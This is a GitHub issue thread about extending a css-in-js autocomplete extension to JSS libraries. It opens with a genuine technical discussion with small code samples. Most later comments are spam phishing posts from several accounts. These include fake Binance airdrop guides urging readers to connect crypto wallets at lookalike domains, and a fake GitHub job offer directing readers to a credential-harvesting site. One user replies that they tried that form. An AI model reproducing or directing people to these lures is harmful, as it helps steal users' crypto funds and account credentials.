### ISSUE TITLE
Please support other libraries as well

### ISSUE THREAD

**Issue by kof** [ansumanshah/css-in-js#14]
For e.g. styled-primitives library based on JSS http://cssinjs.org/styled-jss/ and core JSS and http://cssinjs.org/react-jss

I am happy to help where I can.

**Comment by paulmolluzzo** [comment]
Thanks for the suggestion! Any ideas on what we would need to do to support those libraries? Is it just auto completing to the usual CSS string or something more than that?

Ultimately (as least for VS Code) there should be a means on discovering which syntax you want so the autocomplete provides those suggestions. Right now VS Code just provides suggestions in any JS file with no regard for scope. 😕

Of course PRs welcome, but maybe first we can just define the needed features.

**Comment by kof** [comment]
### React-JSS example

```js
import injectSheet from 'react-jss'

const styles = {
  label: {
    fontWeight: 'bold'
  }
}

export default injectSheet(styles)(Component)
```

What do we need to identify styles in such case?

**Comment by kof** [comment]
Styled-JSS is similar to styled components at this point

```js
import styled from 'styled-jss'

const Button = styled('button')({
  fontSize: 12,
  color: (props) => props.theme.textColor
})
```

**Comment by ansumanshah** [comment]
We currently support the styled-jss syntax as any function with name styled/css is supported

but for react-jss I feel as it is a general object syntax we can't do much, maybe at max we can check wherever name of the an object is `styles` we can show autocomplete in that case (not sure of the performance issue it can/maybe cause)

**Comment by kof** [comment]
what about following `injectSheet(styles)` function call?

**Comment by kof** [comment]
So Styled-JSS is supported, even though it uses objects, not strings?

**Comment by kof** [comment]
ok tried styled-jss and glamorous, it works, awesome! Lets add examples!

**Comment by ansumanshah** [comment]
actually any function call with a name that follows the regex `glamorous|css|style|StyleSheet.create` is valid for now, even if it contains string literals, that is a bug I think

**Comment by kof** [comment]
so you are tracking function calls with a regex, thats why it needs to be an obejct directly like css({...}), not css(objectRef)

**Comment by ansumanshah** [comment]
yes css(objectRef) would not work as we are not parsing the whole file for all calls

**Comment by ansumanshah** [comment]
Would you suggest a way if that could work?

**Comment by kof** [comment]
> Would you suggest a way if that could work?

If we start parsing javascript with a real parser?

**Comment by ansumanshah** [comment]
babel parser fails as the input is not a valid js when user is typing

**Comment by kof** [comment]
Can we make an assumption what valid js would be in our specific case and give babel parser something that is valid?

**Comment by kof** [comment]
If it is all too complicated, we can just say that injectSheet({}) needs to be used, no refs. It would be a limitation, but at least something working.

**Comment by kof** [comment]
functions we have right now is injectSheet()  and createStyleSheet() (core JSS)

**Comment by kof** [comment]
Also I assume `@injectSheet()` already works, because it looks like a fn call for the regex, right?

**Comment by ansumanshah** [comment]
regex is editable in the settings we can specify more defaults as well, we can try with the 
const styles = {}; object as well and check for issues if any.

**Comment by kof** [comment]
Cool, yeah better defaults is nice, because people will fail to edit those settings 90% of the time and then ask why it doesn't work)

**Comment by ansumanshah** [comment]
True, default are specified [here](https://github.com/ansumanshah/css-in-js/blob/master/packages/atom-css-in-js/lib/config.json#L6) for now and I am not that good with regex so we will have to cross check cases for now

**Comment by peteruithoven** [comment]
A totally different approach might be to also look at file extensions. This could be used when using:
- separate .jss files with just the jss code
- Webpack (so you could add a .jss loader config)

The list of supported extensions would need to be configurable to support other css-in-js approaches.

Beside supporting a smaller usecase, would there be downsides to this?

**Comment by Rishabh-Streak** [comment]
> For e.g. styled-primitives library based on JSS http://cssinjs.org/styled-jss/ and core JSS and http://cssinjs.org/react-jss
> 
> I am happy to help where I can.

I have tried to solve the same issue [here](https://github.com/Rishabh-Rathod/css-to-js)  
For now i have focused more on JSS syntax 

it supports Css Pseudo Classes.

i am planning to also support for styled-components & Emotion.

**Comment by marisadotdev** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @zippoxer, @madlabman, @Daudxu, @z0uki, @d4rm5, @kodeemcintosh, @swolidity, @jpzk, @xSatori, @async9, @francoabaroa, @RodrigoAD, @MantisClone, @0xRory, @hoductrong, @aheckmann, @jiaji-wei, @myfocus, @POKENA7, @lessthanno, @aquaticone, @moaazsidat, @alexewsv, @Smart-HKR, @script-money, @Destiner, @lorancecall, @diogoribeirodev, @jackmarsh, @oo00spy00oo, @ChinW, @ArianHamdi, @kuromoka, @tony-riotracers, @8times4, @lylwx, @OGDAO332, @alandotcom, @fffedor, @cchyung, @lazydefi1, @bronzelle, @spachib, @0xhashmap, @AndreyBronin, @johnnieskywalker, @RickyC0626, @m00n620, @christophercr, @hiroism007

**Comment by marisadotdev** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by marisadotdev** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by BhavyClover** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://link.bnbreward.online/0mhPJ2)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://link.bnbreward.online/0mhPJ2) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @

**Comment by flexipgroup** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://giveway.binancbnbrewards.online/4JhoUO)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](http://giveway.binancbnbrewards.online/4JhoUO) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @llapuras, @Osub, @Kenshinhu, @haobeiwei, @ls0f, @DurianLian, @gongxb21, @songkai237, @liuweinan0575, @luoshihui, @shaoleibo, @neohope, @Vimiy, @zhaixuepan, @qq776355102, @laonsx, @liu, @nalxalni, @shigongpeng1, @sakulali, @yangguoif, @yfde11, @yiwenLin, @yadongcao, @TbhT, @softcheck, @zzc5464, @TesterCC, @zshvvhm, @lxq2537664558, @kitety, @Cai-Go, @liucaihe, @zgqing, @XinHeCS, @nkorange, @wulianglongrd, @happyemoji, @ywmsytxy, @liruixuan, @skierlin, @dandelionzbx, @apenshar, @chengwengao, @hawkchch, @mankeyl, @MasterMote, @kaaaaai, @Kenmmm, @JTangming

**Comment by shivachaitanya1** [comment]
# $BNB Airdrop: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've been selected to receive a portion of the $1.5k Binance Airdrop. We're thrilled to offer you $1500 in BNB. But wait, there's more—connect now, and instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://public.bnbstatic.com/image/cms/content/body/202401/419d0457e5bda211db09c4d5ae180da6.png)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1000 in BNB! Additionally, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, take the opportunity to win up to $20,000—it's your golden chance!


Winners: @kalaspuff, @dno15x, @PaDuckk, @yellowsae, @MartinGbz, @feikerwu, @ilirhushi

**Comment by mepcovenkat97** [comment]
Hello,

We have an exciting opportunity for you! You've been selected to proceed in the selection process for the Developer position at GitHub. Congratulations on your achievement!

As part of this position, you will be offered a competitive salary of $180,000 per year, along with other attractive benefits, including:

- Health insurance coverage
- Retirement savings plan
- Flexible work schedule
- Generous vacation and paid time off
- Professional development opportunities

To proceed with the hiring process, we kindly ask you to fill out some additional forms and provide some additional information. This will help us better understand your profile and experience, as well as assess your suitability for the role.

Please click [here](https://auth.githubtalentcommunity.online/) to access the forms and complete the application process. We ask that you complete these forms as soon as possible so that we can proceed with the hiring process.

**Important:** You have 24 hours to complete the application process.

If you have any questions or need further information, please don't hesitate to contact us.

Thank you for your interest in joining the GitHub team, and we look forward to hearing back from you.

Best regards,  
GitHub Recruitment Team
bensbahou, @Adstefnum, @sonm-usui, @sirhashalot, @rajkharvar, @yashcoincade, @xeno097, @nhancv, @katovBash, @jskway, @cryptokuma, @llllvvuu, @ewerx, @nickuya, @francesco-plt, @kosaki08, @Ricardo96r, @Lokicommits, @chlzhu, @curol

**Comment by kosaki08** [comment]
Hello,
I just tried to access the form and got a DNS_PROBE_FINISHED_NXDOMAIN
error. Today I had an unlucky oral surgery earlier in the day and am still
dazed from the anesthesia. Was it closed because I accessed it too late? I
can provide proof of surgery if needed.
Thank you in advance for your support.

2024年2月21日(水) 11:46 Github Jobs ***@***.***>:
